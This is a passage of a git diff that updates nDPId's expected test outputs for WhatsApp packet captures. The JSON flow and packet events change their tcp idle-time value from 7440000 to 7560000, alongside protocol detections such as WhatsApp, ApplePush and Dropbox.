QuN0jBEi2sNdUH+3VURleCkMaERRQQs2Fub+QUSLgkRAhefAGFzZxVCC52B4evzq7Cz7lW8fuDhUSEwqmRuVuaK7KmZTAj\/JcTRaXUVChFbQXi6T9DG8GOYrQ3cgORiCgEhtpuRfeKNmM1Ic+HX03yWe2oxtSVVy4N22M9Svs5SDcjT\/U2Guvq6M+RgrH5sh4Ew0i0LSm0dEuk7kx1gbhQeJQH"} -00896{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1432582413522,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":375,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":375,"pkt_l4_len":341,"thread_ts_msec":1432582413522,"pkt":"APS5Jrv0xiwDYGpkCABFAAFpJvAAAC8GqnYRbuUOwKgCBBRnwCnUixwguGhbLIAYAUlW0AAAAQEICm+JXrst\/BtwFwMBATAEtIuqVIsa2PHNKJeXP8xTjhoqWdhKZwOmK+i+hD5yD1M8ZM2np34aAKWtz8Bb1aOnbLJLQUe09gfoXrYrjNyw4Kz3tEhKuIJxuOR\/NLSkV4SGkIhMwiudLCMa+dHjOQ4E1rq3emNZqDFKuO5luZdltedNjC1Ni5FOba+q6FF8xJzIsSuI9Rh7dvtMvFQuN0jBEi2sNdUH+3VURleCkMaERRQQs2Fub+QUSLgkRAhefAGFzZxVCC52B4evzq7Cz7lW8fuDhUSEwqmRuVuaK7KmZTAj\/JcTRaXUVChFbQXi6T9DG8GOYrQ3cgORiCgEhtpuRfeKNmM1Ic+HX03yWe2oxtSVVy4N22M9Svs5SDcjT\/U2Guvq6M+RgrH5sh4Ew0i0LSm0dEuk7kx1gbhQeJQH"} +00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":85,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582411561,"flow_last_seen":1432582411561,"flow_idle_time":7560000,"flow_min_l4_payload_len":309,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":309,"midstream":1,"thread_ts_msec":1432582411561,"l3_proto":"ip4","src_ip":"17.110.229.14","dst_ip":"192.168.2.4","src_port":5223,"dst_port":49193,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00896{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1432582411561,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":375,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":375,"pkt_l4_len":341,"thread_ts_msec":1432582411561,"pkt":"APS5Jrv0xiwDYGpkCABFAAFpJu4AAC8GqngRbuUOwKgCBBRnwCnUixwguGhbLIAYAUleegAAAQEICm+JVxEt\/BtwFwMBATAEtIuqVIsa2PHNKJeXP8xTjhoqWdhKZwOmK+i+hD5yD1M8ZM2np34aAKWtz8Bb1aOnbLJLQUe09gfoXrYrjNyw4Kz3tEhKuIJxuOR\/NLSkV4SGkIhMwiudLCMa+dHjOQ4E1rq3emNZqDFKuO5luZdltedNjC1Ni5FOba+q6FF8xJzIsSuI9Rh7dvtMvFQuN0jBEi2sNdUH+3VURleCkMaERRQQs2Fub+QUSLgkRAhefAGFzZxVCC52B4evzq7Cz7lW8fuDhUSEwqmRuVuaK7KmZTAj\/JcTRaXUVChFbQXi6T9DG8GOYrQ3cgORiCgEhtpuRfeKNmM1Ic+HX03yWe2oxtSVVy4N22M9Svs5SDcjT\/U2Guvq6M+RgrH5sh4Ew0i0LSm0dEuk7kx1gbhQeJQH"} +00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":85,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582411561,"flow_last_seen":1432582411561,"flow_idle_time":7560000,"flow_min_l4_payload_len":309,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":309,"midstream":1,"thread_ts_msec":1432582411561,"l3_proto":"ip4","src_ip":"17.110.229.14","dst_ip":"192.168.2.4","src_port":5223,"dst_port":49193,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}} +00896{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1432582412221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":375,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":375,"pkt_l4_len":341,"thread_ts_msec":1432582412221,"pkt":"APS5Jrv0xiwDYGpkCABFAAFpJu8AAC8GqncRbuUOwKgCBBRnwCnUixwguGhbLIAYAUlb7AAAAQEICm+JWZ8t\/BtwFwMBATAEtIuqVIsa2PHNKJeXP8xTjhoqWdhKZwOmK+i+hD5yD1M8ZM2np34aAKWtz8Bb1aOnbLJLQUe09gfoXrYrjNyw4Kz3tEhKuIJxuOR\/NLSkV4SGkIhMwiudLCMa+dHjOQ4E1rq3emNZqDFKuO5luZdltedNjC1Ni5FOba+q6FF8xJzIsSuI9Rh7dvtMvFQuN0jBEi2sNdUH+3VURleCkMaERRQQs2Fub+QUSLgkRAhefAGFzZxVCC52B4evzq7Cz7lW8fuDhUSEwqmRuVuaK7KmZTAj\/JcTRaXUVChFbQXi6T9DG8GOYrQ3cgORiCgEhtpuRfeKNmM1Ic+HX03yWe2oxtSVVy4N22M9Svs5SDcjT\/U2Guvq6M+RgrH5sh4Ew0i0LSm0dEuk7kx1gbhQeJQH"} +00896{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1432582413522,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":375,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":375,"pkt_l4_len":341,"thread_ts_msec":1432582413522,"pkt":"APS5Jrv0xiwDYGpkCABFAAFpJvAAAC8GqnYRbuUOwKgCBBRnwCnUixwguGhbLIAYAUlW0AAAAQEICm+JXrst\/BtwFwMBATAEtIuqVIsa2PHNKJeXP8xTjhoqWdhKZwOmK+i+hD5yD1M8ZM2np34aAKWtz8Bb1aOnbLJLQUe09gfoXrYrjNyw4Kz3tEhKuIJxuOR\/NLSkV4SGkIhMwiudLCMa+dHjOQ4E1rq3emNZqDFKuO5luZdltedNjC1Ni5FOba+q6FF8xJzIsSuI9Rh7dvtMvFQuN0jBEi2sNdUH+3VURleCkMaERRQQs2Fub+QUSLgkRAhefAGFzZxVCC52B4evzq7Cz7lW8fuDhUSEwqmRuVuaK7KmZTAj\/JcTRaXUVChFbQXi6T9DG8GOYrQ3cgORiCgEhtpuRfeKNmM1Ic+HX03yWe2oxtSVVy4N22M9Svs5SDcjT\/U2Guvq6M+RgrH5sh4Ew0i0LSm0dEuk7kx1gbhQeJQH"} 01130{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1432582426553,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"thread_ts_msec":1432582426553,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAAISk3sAAEARXw\/AqAIBwKgC\/0RcRFwB\/jsJeyJob3N0X2ludCI6IDMzNzUzNTk1OTMsICJ2ZXJzaW9uIjogWzEsIDhdLCAiZGlzcGxheW5hbWUiOiAiIiwgInBvcnQiOiAxNzUwMCwgIm5hbWVzcGFjZXMiOiBbMTQ4MTkzMzcsIDE3NjA5OTYzLCAyMDY0OTM0OSwgMjg1MjE2MDcsIDU4MzQ0OTk2LCA2MDU5NDk4MywgNjQ0MzYwOTksIDk2ODUzMjI0LCA5OTQ2OTc3MywgMTAxMDQ3OTk2LCAxMDgxNTkxMDIsIDEyNTU0MDU2NiwgMTc2OTY0MzA3LCAyNDM2ODI5ODYsIDI0NzkyNTA4NSwgMjYwNDY1MjYxLCAyNzA0MDQ3NDIsIDI4Mzg2MTQ1NywgNDI0NTQwMTk3LCA0NDgzOTczOTMsIDQ1MTQ3MjY1OCwgNTExNzA2NjQyLCA1NjgzOTU4MzMsIDU5NDI0Njk1NCwgNTk4MDYxMDY2LCA2MTU5ODMzNzksIDcyMDA1ODM2MSwgNzM1MDUxODMwLCA3MzYzNDE1MjgsIDc0MTI1NTYxMywgNzc2MDg3MjQ3LCA3ODA4NzA1ODEsIDc4Mjk4MTk0OSwgNzg1MjY2MTc3LCA4MTg3NTI3MTAsIDg1NTY4MjM5MCwgODg0MTIwMTMyLCA5MDg5MTQ4NjhdfQ=="} 00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1432582399902,"flow_last_seen":1432582425196,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":1800,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1432582431565,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} 00599{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582402667,"flow_last_seen":1432582402667,"flow_idle_time":180000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1432582431565,"l3_proto":"ip6","src_ip":"fe80::189c:c31b:1298:224","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1432582396509,"flow_last_seen":1432582426553,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":1004,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1432582431565,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1432582379543,"flow_last_seen":1432582379571,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":196,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1432582431565,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":61697,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"}} -00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1432582379591,"flow_last_seen":1432582399306,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":963,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1432582431565,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"158.85.58.15","src_port":49206,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00697{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1432582411561,"flow_last_seen":1432582431565,"flow_idle_time":7440000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":1699,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1432582431565,"l3_proto":"ip4","src_ip":"17.110.229.14","dst_ip":"192.168.2.4","src_port":5223,"dst_port":49193,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}} +00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1432582379591,"flow_last_seen":1432582399306,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":963,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1432582431565,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"158.85.58.15","src_port":49206,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00697{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1432582411561,"flow_last_seen":1432582431565,"flow_idle_time":7560000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":1699,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1432582431565,"l3_proto":"ip4","src_ip":"17.110.229.14","dst_ip":"192.168.2.4","src_port":5223,"dst_port":49193,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}} 00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582402666,"flow_last_seen":1432582402666,"flow_idle_time":180000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1432582431565,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1432582377898,"flow_last_seen":1432582377898,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432582431565,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":44,"flow_first_seen":1432582381179,"flow_last_seen":1432582385071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":18995,"flow_avg_l4_payload_len":431,"midstream":1,"thread_ts_msec":1432582431565,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49205,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":44,"flow_first_seen":1432582381179,"flow_last_seen":1432582385071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":18995,"flow_avg_l4_payload_len":431,"midstream":1,"thread_ts_msec":1432582431565,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49205,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 00566{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":93,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","packets-captured":93,"packets-processed":93,"total-skipped-flows":0,"total-l4-data-len":24799,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":9,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":9,"total-idle-flows":9,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":51,"global_ts_msec":1432582431565} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 93/93 diff --git a/test/results/whatsapp_voice_and_message.pcap.out b/test/results/whatsapp_voice_and_message.pcap.out index 62311ad18..52978eb0c 100644 --- a/test/results/whatsapp_voice_and_message.pcap.out +++ b/test/results/whatsapp_voice_and_message.pcap.out @@ -1,10 +1,10 @@ 00477{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1432820558921} -00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820558921,"flow_last_seen":1432820558921,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432820558921,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"184.173.179.46","src_port":35480,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1432820558921,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1432820558921,"pkt":"ABoRAAACABoRAAABCABFAAA89o5AAEAGzkgKCAABuK2zLoqYAbsGFK3rAAAAAKACOQj9WQAAAgQFtAQCCAoABFtlAAAAAAEDAwQ="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1432820558982,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820558982,"pkt":"ABoRAAACABoRAAABCABFAAAoAAJAABAG9Om4rbMuCggAAQG7ipj561IUBhSt7FAS\/\/+tmQAA"} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1432820558982,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820558982,"pkt":"ABoRAAACABoRAAABCABFAAAo9o9AAEAGzlsKCAABuK2zLoqYAbsGFK3s+etSFVAQOQh0kgAA"} -00796{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820558921,"flow_last_seen":1432820559129,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432820559129,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"184.173.179.46","src_port":35480,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820558921,"flow_last_seen":1432820558921,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432820558921,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"184.173.179.46","src_port":35480,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1432820558921,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1432820558921,"pkt":"ABoRAAACABoRAAABCABFAAA89o5AAEAGzkgKCAABuK2zLoqYAbsGFK3rAAAAAKACOQj9WQAAAgQFtAQCCAoABFtlAAAAAAEDAwQ="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1432820558982,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820558982,"pkt":"ABoRAAACABoRAAABCABFAAAoAAJAABAG9Om4rbMuCggAAQG7ipj561IUBhSt7FAS\/\/+tmQAA"} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1432820558982,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820558982,"pkt":"ABoRAAACABoRAAABCABFAAAo9o9AAEAGzlsKCAABuK2zLoqYAbsGFK3s+etSFVAQOQh0kgAA"} +00796{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820558921,"flow_last_seen":1432820559129,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432820559129,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"184.173.179.46","src_port":35480,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820567259,"flow_last_seen":1432820567259,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432820567259,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.84.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1432820567259,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432820567259,"pkt":"ABoRAAACABoRAAABCABFwACaAABAAEARvE0KCAABHw1UMNF0DZYAhk4lAAMAaiESpEIAANFg4Ox4XqyZamxAAABmAQCy86Qxc0\/TrfZVVa\/eTEZDohPoeRLoRZc1aFVhrGc1f8RW2vMjT5P8rAsiwZ+p9NloXItIT0xPBspixBWhh83rOo673FqXfKhsmqCbgcYysEXxS1G0BQlmTNaw3EzKh7wFRa3N"} 00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820567259,"flow_last_seen":1432820567259,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432820567259,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.84.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} @@ -45,30 +45,30 @@ 00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820571488,"flow_last_seen":1432820571488,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432820571488,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.73.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 